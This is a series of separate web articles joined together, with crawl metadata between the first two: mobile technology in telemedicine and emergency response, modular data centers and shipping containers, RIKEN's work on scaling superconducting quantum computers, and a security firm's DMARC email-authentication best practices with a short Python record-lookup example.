Mobile phones allow for easy communication between friends, coworkers, and family members at a moment’s notice. Not only can you connect with your tribe through voice, but you can also reach out through video, text message, and social media. While this reliable access to various forms of communication has many benefits, one of the areas where it provides the most value is healthcare. The rise of concepts like “telemedicine,” which creates digital portals where doctors and patients can communicate at a distance, has transformed the way we think about healthcare. Hospital staff can provide diagnosis and treatment to people in rural parts of a country without asking them to visit a treatment center. Healthcare companies can reduce the costs of keeping teams connected, no matter how globally dispersed healthcare experts may be. Healthcare portals even allow patients to communicate with physicians via their smartphones, providing instant updates about their condition, complete with information taken from wearable devices that monitor things like heart rate, blood pressure, and more.
Qualcomm, the San Diego-based technology company, recently partnered with a local healthcare program in Arizona to use mobile technology to monitor pulmonary and cardiac patients. The patients wear a device connected to a mobile application. This application collects biometric data and sends it to a physician, so the doctor can provide consistent, informed advice on how to manage a condition. The service also allows patients to set appointments and communicate with care managers through their devices, which has led to significantly fewer hospitalizations among the patients monitored.

By allowing physicians to work more effectively with patients in a remote environment, telemedicine solutions can provide a range of benefits to those in need of support. For instance, a mobile medical strategy can help patients communicate accurately with their doctors even when they don’t speak the same language, through natural-language-processing and translation apps powered by artificial intelligence. Telemedicine can also protect people in settings where visiting a doctor for certain reasons would carry social stigma, by allowing them to set up video conferences with the specialist they need. From an economic perspective, telemedicine and mobile technology can also reduce the costs of connecting physicians and patients. While telemedicine and apps may never entirely replace trips to a doctor’s office or hospital, this mode of treatment has already shown significant promise in reducing treatment costs for patients who suffer from chronic illnesses, both mental and physical.

Using Mobile Technology in Emergency Conditions

Mobile technology also has a significant role to play in managing emergencies. For years, we’ve relied on smartphones to reach the help we need when a car breaks down or something goes wrong. Some mobile phone companies even provide panic buttons and GPS tracking with their phones, which makes it easier for responders to reach those in danger. Going forward, mobile technology will continue to play a crucial role in helping hospital staff, Red Cross volunteers, and specialists provide support during natural disasters and emergencies. Collaborative applications like Deltapath’s inTeam can help first responders stay connected and aligned as they assist people who may be injured. With push-to-talk services on communication apps, people in areas without internet connections can still collaborate with their team members. This simultaneously makes communication more efficient in an emergency and keeps costs low for healthcare companies.
<urn:uuid:60fe0f9a-9446-492e-bf7e-e12368dfe6c7>
CC-MAIN-2024-38
https://jp.deltapath.com/newsroom/thrive-global-humanitys-future-and-mobile-technology/
2024-09-18T14:39:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651899.75/warc/CC-MAIN-20240918133146-20240918163146-00088.warc.gz
en
0.951972
1,265
3.0625
3
April 4, 2013

Data centers of the future are letting go of long-held design traditions, with modular products and providers ushering in a new era. A modular data center is an approach to data center design that incorporates the use of factory-built modules or a method for delivering data center infrastructure in a modular fashion. Modular solutions take the best ideas for design, reliability, and efficiency and package them into a prefabricated, repeatable, and operationally optimized module. The modular market started with an international standard approach in the shape of an ISO shipping container, and it has evolved into a fledgling market of vendors that produce everything from containers to a variety of modular products and solutions for IT, power and cooling. In some ways, shifts in IT such as cloud computing have run in parallel with modular data center approaches.

Data Center Containers vs. Modular Data Centers

Often, there is confusion between the terms "data center container" and "modular data center." A data center container is a particular package that is engineered and delivered as such, in an ISO shipping container. A modular data center, on the other hand, refers to a deployment method and engineered solution for assembling a data center out of modular, often prefabricated, components that enable scalability and a rapid delivery schedule. While a container is not the same thing as a modular data center, a container can be part of a modular data center.

Data Center Container: A data center product incorporating customized infrastructure to support power or cooling infrastructure, or racks of IT equipment. Containers are built using an ISO (International Organization for Standardization) intermodal shipping container.

Modular Data Center: An approach to data center design that implies either a prefabricated data center module or a deployment method for delivering data center infrastructure in a modular, quick, and flexible way.

Types of Modular Solutions Available

To build on the terminology that has grown up around containers and modular designs, Jason Schafer of The 451 Group grouped the available modular solutions into four categories. Of the four, only three meet the definition of modular; the fourth, a phased approach, may be conceived of as modular in that it is built out gradually, but is not truly modular.

A number of innovations marked the beginnings of modular products and ideas:

- Google experimented with a container full of IT parked in an underground parking garage, and even went so far as to propose a floating data center on cargo ships.
- In 2006, Sun Microsystems unveiled Project Blackbox, an energy-efficient, water-cooled turnkey data center housed in a shipping container.
- In 2008, Microsoft announced that its new Chicago data center would house up to 220 shipping containers.

After the early development of containers, theories evolved and the hype cycle played out for the "data center in a box." Numerous hardware vendors, independent companies and data center providers embraced the modular concept and presented their own engineered solutions.
Riken Wires a New Path to Scalable Quantum Computing

(MirageNews) Yasunobu Nakamura, Team Leader of the Superconducting Quantum Electronics Research Team, has written an extensive explanation of why he believes a new circuit-wiring scheme, developed over the last three years by RIKEN in collaboration with other institutes, opens the door to scaling up to 100 or more qubits within the next decade.

Challenge One: Scalability

The challenge of scalability arises from the fact that each qubit needs wiring and connections that produce controls and readouts with minimal crosstalk. As we moved past tiny two-by-two or four-by-four arrays of qubits, we realized just how densely the associated wiring can be packed, and we've had to create better systems and fabrication methods to avoid getting our wires crossed, literally.

Challenge Two: Stability

In theory, one way we could deal with instability is to use quantum error correction, in which we exploit several physical qubits to encode a single 'logical qubit' and apply an error-correction protocol that can diagnose and fix errors to protect the logical qubit. But realizing this is still far off, for many reasons, not the least of which is the problem of scalability.

Challenge Three: Quantum Circuits

We at RIKEN eventually came up with the idea of using a superconducting circuit. The superconducting state is free of all electrical resistance and losses, and so it responds cleanly to small quantum-mechanical effects. We use our superconducting quantum-circuit platform in combination with other quantum-mechanical systems. This hybrid quantum system allows us to measure a single quantum excitation within collective excitations, be it the precession of electron spins in a magnet, crystal lattice vibrations in a substrate, or electromagnetic fields in a circuit, with unprecedented sensitivity. Interfacing a superconducting quantum computer to an optical quantum communication network is another future challenge for our hybrid system.
by Chuck Mackey and Will Hudec

What is DMARC?

DMARC (Domain-based Message Authentication, Reporting, and Conformance) is a powerful email authentication protocol designed to protect your email domain from being impersonated. It works by comparing the sender address to authentication information in the email to verify that the message really is from your domain.

How does it work?

When you enable DMARC, receiving email services check incoming emails that claim to be from your domain against your DMARC settings. If an email fails the DMARC check, it can be rejected or treated with suspicion.

Why is it important?

- It prevents attackers from sending emails that appear to come from your domain
- It allows recipients to identify and reject spoofed/phished emails
- It gives visibility into misuse of your domain for sending emails
- It enforces email authentication policies across your domain

The DMARC protocol increases the trustworthiness of your domain and enhances email deliverability. While it is an essential tool in your email security toolkit, it should be part of a broader email security strategy that includes other measures such as user training, strong passwords, and regular security updates.

Fortress Security Risk Management offers the following best practices for establishing and optimizing DMARC:

1. Understand DMARC Basics: Familiarize yourself with the DMARC protocol and how it works. It builds upon SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to add an additional layer of protection.

2. Gradual Deployment: Start with a "p=none" policy, which monitors and reports but doesn't enforce. This allows you to understand the email landscape for your domain without affecting email delivery.

3. Publish DMARC Records: Publish a DMARC DNS record for your domain. This record specifies your DMARC policy, how to handle emails that don't pass authentication, and where to send aggregate and forensic reports. (An example record, and how to look one up, is sketched at the end of this article.)

4. Alignment of SPF and DKIM: Ensure that SPF and DKIM records are properly configured and aligned with your DMARC policy. This "alignment" is crucial for DMARC to work effectively: make sure the "From" domain in the email header aligns with your SPF and DKIM.

5. Use DKIM Signatures: Always use DKIM signatures for your outgoing emails. This ensures that email recipients can verify the authenticity of your messages.

6. Subdomain Policy: Consider setting separate DMARC policies for your subdomains. You can start with a less strict policy for subdomains and tighten it as needed.

7. Use Reporting: Configure DMARC to send reports to your specified email address. These reports provide valuable insights into the sources and results of email authentication checks, helping you identify any issues.

8. Review DMARC Reports: Regularly analyze DMARC reports to understand who is sending emails on behalf of your domain. Look for anomalies and unauthorized senders.

9. Gradual Policy Enforcement: Once you've gathered enough data and are confident in your email infrastructure, switch to a "p=quarantine" or "p=reject" policy to stop unauthorized emails. Be cautious about moving too quickly, as it can lead to legitimate emails being rejected.

10. Authenticity Checks: Ensure that your email authentication methods, such as SPF and DKIM, are correctly implemented. Review the DMARC reports for any authentication failures and resolve them.

11. Monitor Email Deliverability: Continuously monitor email deliverability to ensure that legitimate emails aren't being blocked or sent to spam.
Keep an eye on bounce rates, engagement metrics, and feedback loops.

12. Implement DMARC Alerts: Configure email alerts to notify you of any DMARC policy failures, so you can take immediate action if your domain is being abused.

13. Maintain Your DMARC Record: Regularly review and update your DMARC record as your email infrastructure evolves.

14. Education and Training: Educate your team and users about the importance of DMARC and how it helps protect against phishing. Encourage them to be vigilant and report any suspicious emails.

15. Seek Professional Assistance: If you're unsure about DMARC implementation, consider drawing on email security expertise from Fortress SRM for selecting and using email security tools and services.

Properly implemented, DMARC provides strong protection against email spoofing and phishing attacks, giving recipients high confidence in the authenticity of emails from your domain.

About Fortress SRM: Fortress Security Risk Management protects companies from the financial, operational, and emotional trauma of cybercrime by enhancing the performance of their people, processes, and technology. Offering a robust, co-managed solution to enhance an internal IT team's capability and capacity, Fortress SRM features a full suite of managed security services (24/7/365 U.S.-based monitoring, cyber hygiene (managed patching), endpoint detection and response (EDR), and air-gapped and immutable cloud backups) plus specialized services like Cybersecurity-as-a-Service, incident response including disaster recovery and remediation, M&A cyber due diligence, GRC advisory, identity & access management, threat intelligence, vulnerability assessments, and technical testing. With headquarters in Cleveland, Fortress SRM supports companies with both domestic and international operations.

In Case of Emergency: Cyber Attack Hotline: 888-207-0123 | Report an Attack: IR911.com
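As referenced at tip 3, here is what a published DMARC record can look like and how to fetch one. The sketch uses the dnspython package (2.x); the domain and the policy values shown in the comment are placeholders for illustration, not recommendations for any particular organization.

```python
# pip install dnspython
import dns.resolver


def fetch_dmarc(domain: str) -> str | None:
    """A domain's DMARC policy lives in a TXT record at _dmarc.<domain>."""
    try:
        answers = dns.resolver.resolve(f"_dmarc.{domain}", "TXT")
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return None  # no DMARC record published
    for rdata in answers:
        txt = b"".join(rdata.strings).decode()
        if txt.startswith("v=DMARC1"):
            return txt
    return None


# A typical monitoring-first policy, published as a TXT record on _dmarc.example.com:
#   v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com; pct=100
# p=none corresponds to the "gradual deployment" stage in tip 2; moving to
# p=quarantine or p=reject later is the enforcement step described in tip 9.
print(fetch_dmarc("example.com"))
```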